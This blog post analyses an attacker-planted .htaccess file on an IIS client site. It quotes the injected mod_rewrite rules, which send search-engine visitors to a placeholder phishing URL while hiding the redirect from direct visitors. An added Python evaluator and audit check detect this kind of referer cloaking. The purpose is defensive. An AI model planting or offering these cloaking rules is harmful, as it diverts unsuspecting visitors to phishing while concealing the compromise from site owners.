Thursday, January 22nd, 2009 | Author:

I very recently found a problem with a client’s web site due to a .htaccess file. The site was hosted on a Windows server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as Apache, however. If a .htaccess file exists, it must contain only rules that IISPassword understands; otherwise the server serves nothing from that directory and returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. The RewriteRule only fires when one of the RewriteCond lines matches, and the conditions are joined with [OR], so only visitors whose Referer header names one of the listed search engines and directories would be redirected to the siffy phishing URL that the cracker wants victims to reach. Anyone typing the address directly, including the site owner checking their own site, sends no matching Referer and sees the site working normally, which is exactly why referer-based cloaking like this can go unnoticed. Note also that the last condition, .*ya.*$, matches any referer containing the letters "ya" (the earlier yahoo and yandex lines are therefore redundant), so unrelated referers can trigger the redirect too.
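As an added illustration (this is not code from the original post), the following Python evaluator implements the subset of mod_rewrite semantics these lines rely on (RewriteCond on %{HTTP_REFERER}, the NC and OR flags, a RewriteRule with R and L) and runs the .htaccess above against a few constructed requests, so you can see who is redirected and who is not. It also includes a small audit check that flags any off-site redirect conditioned on the Referer header, which is the pattern to look for when scanning .htaccess files on a hosting account. The copy of the .htaccess, the request headers and all helper names are constructed for this example.

```python
"""Offline evaluator for referer-conditional mod_rewrite redirects.

Added example, not code from the original post.  It implements only the
subset of mod_rewrite the injected .htaccess relies on: RewriteCond on
%{HTTP_REFERER}, the NC and OR flags, one RewriteRule with R and L.
SAMPLE_HTACCESS is a constructed copy of the file quoted in the post.
"""
import re
from dataclasses import dataclass

SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]
"""

@dataclass
class Cond:
    var: str       # e.g. %{HTTP_REFERER}
    pattern: str   # regex; a leading ! negates it
    flags: set

@dataclass
class Rule:
    conds: list    # RewriteCond lines guarding this rule
    pattern: str   # matched against the request path
    target: str
    flags: set

def _flags(raw):
    """'[NC,OR]' -> {'NC', 'OR'}; '' -> set()."""
    return {f.strip().upper() for f in raw.strip("[]").split(",") if f.strip()}

def parse_htaccess(text):
    """Attach each run of RewriteCond lines to the RewriteRule that follows."""
    rules, pending = [], []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        flags = _flags(parts[3]) if len(parts) > 3 else set()
        if parts[0].lower() == "rewritecond" and len(parts) >= 3:
            pending.append(Cond(parts[1], parts[2], flags))
        elif parts[0].lower() == "rewriterule" and len(parts) >= 3:
            rules.append(Rule(pending, parts[1], parts[2], flags))
            pending = []   # conditions only apply to the next rule
    return rules

def _cond_matches(cond, request):
    value = request.get(cond.var.strip("%{}"), "")   # absent header -> ""
    negate = cond.pattern.startswith("!")
    pattern = cond.pattern[1:] if negate else cond.pattern
    re_flags = re.IGNORECASE if "NC" in cond.flags else 0
    return (re.search(pattern, value, re_flags) is not None) != negate

def conds_hold(conds, request):
    """Conditions are ANDed, except that [OR] ORs a condition with the next one."""
    group_true = False
    for cond in conds:
        group_true = group_true or _cond_matches(cond, request)
        if "OR" in cond.flags:
            continue               # still inside an OR group
        if not group_true:
            return False           # an AND group failed
        group_true = False         # start the next group
    # A trailing [OR] leaves the last group open; it must still have matched.
    return group_true if conds and "OR" in conds[-1].flags else True

def resolve(rules, request):
    """Return the off-site redirect target the request would get, or None."""
    path = request.get("REQUEST_URI", "/")
    for rule in rules:
        re_flags = re.IGNORECASE if "NC" in rule.flags else 0
        if not re.search(rule.pattern, path, re_flags) or not conds_hold(rule.conds, request):
            continue
        if any(f == "R" or f.startswith("R=") for f in rule.flags):
            return rule.target     # external redirect (302 unless R=code)
        path = rule.target         # internal rewrite; stop on [L]
        if "L" in rule.flags:
            break
    return None

def find_referer_cloaking(rules):
    """Audit check: any off-site redirect taken only when the Referer matches.
    The owner (no Referer) sees the real site; search traffic is diverted."""
    findings = []
    for rule in rules:
        on_referer = [c.pattern for c in rule.conds if c.var.upper() == "%{HTTP_REFERER}"]
        if on_referer and re.match(r"https?://", rule.target, re.IGNORECASE):
            findings.append((rule.target, on_referer))
    return findings

if __name__ == "__main__":
    rules = parse_htaccess(SAMPLE_HTACCESS)
    for ref in ("", "https://www.google.com/search?q=client", "https://www.bing.com/",
                "https://kenya.example/"):   # the last one trips the sloppy .*ya.*$
        hit = resolve(rules, {"REQUEST_URI": "/index.html", "HTTP_REFERER": ref})
        print(f"{ref or '(direct)':42} -> {hit or 'site content'}")
    for target, patterns in find_referer_cloaking(rules):
        print("cloaked redirect to", target, "guarded by", patterns)
```

On a live host the same comparison takes two requests, one without a Referer header and one with Referer: https://www.google.com/, diffing the status line and any Location header; a site that only redirects the second request is cloaking. On the IIS/IISPassword server in the post the file is never evaluated at all, which is why the symptom there was the Error 500 rather than a redirect.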

Of course, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying, as I can foresee many arguments about whether or not the site is working.
